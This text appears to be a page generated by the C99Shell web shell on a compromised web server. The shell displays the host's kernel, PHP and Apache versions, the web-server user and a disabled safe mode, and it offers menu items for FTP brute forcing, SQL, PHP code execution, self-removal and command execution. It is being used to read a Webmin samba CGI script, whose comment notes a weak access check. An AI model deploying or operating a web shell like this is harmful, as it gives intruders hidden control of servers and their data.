mina-info.me - c99shell

!C99Shell v. 1.0 pre-release build #16!
Software: Apache/2.0.54 (Fedora). PHP/5.0.4 uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t Safe-mode: OFF (not secure) /usr/libexec/webmin/samba/ drwxr-xr-x Free 5.3 GB of 27.03 GB (19.6%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t

Safe-mode: OFF (not secure)

/usr/libexec/webmin/samba/ drwxr-xr-x
Free 5.3 GB of 27.03 GB (19.6%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# kill_user.cgi
# Kill a samba process connecting to some client

require './samba-lib.pl';
&ReadParse();

# check acls

&error_setup("$text{'eacl_aviol'}ask_epass.cgi");
if ($in{share}) { # this may be cracked very easy, don't know how to do better :(
    # per-share acls ...
    &error("$text{'eacl_np'} $text{'eacl_pkill'}") 
        unless &can('rvV',\%access, $in{share}); # read, view conn, kill conn
    }
else {
    &error("$text{'eacl_np'} $text{'eacl_pgkill'}") 
        unless $access{'view_all_con'} && $access{'kill_con'};
    }
    
&kill_logged('TERM', $in{'pid'});
&webmin_log("kill", undef, $in{'pid'}, \%in);
if ($in{share}) { &redirect("view_users.cgi?share=$in{share}"); }
else { &redirect("view_users.cgi"); }

:: Command execute ::
Enter:	Select: